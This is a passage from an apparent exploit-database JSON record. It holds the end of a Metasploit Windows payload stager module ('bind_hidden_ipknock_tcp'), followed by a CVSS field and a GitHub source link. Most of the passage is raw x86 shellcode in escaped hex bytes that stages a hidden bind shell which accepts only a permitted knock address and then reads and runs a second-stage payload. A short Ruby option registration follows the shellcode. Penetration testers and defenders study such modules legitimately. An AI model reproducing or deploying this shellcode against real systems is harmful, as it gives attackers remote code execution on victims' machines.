\"\\xa2\\x77\\x29\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\\xe8\" +\n \"\\x1a\\x00\\x00\\x00\\x8b\\x44\\x24\\x04\\x8b\\x40\\x04\\x8b\\x40\\x04\\x2d\\xc0\" +\n \"\\xa8\\x01\\x21\\x74\\x03\\x31\\xc0\\x40\\x89\\x45\\x54\\xc2\\x20\\x00\\x53\\x53\" +\n \"\\x57\\x68\\x94\\xac\\xbe\\x33\\xff\\xd5\\x83\\x7c\\x24\\x04\\x00\\x75\\xcf\\x40\" +\n \"\\x75\\x06\\x53\\x53\\xeb\\xe8\\x74\\xc6\\x48\\x57\\x97\\x68\\x75\\x6e\\x4d\\x61\" +\n \"\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x8b\" +\n \"\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\" +\n \"\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\" +\n \"\\x01\\xc3\\x29\\xc6\\x75\\xee\\xc3\"\n }\n ))\n\n register_options([\n OptAddress.new('KHOST', [true, \"IP address allowed\", nil])\n ])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb"}]}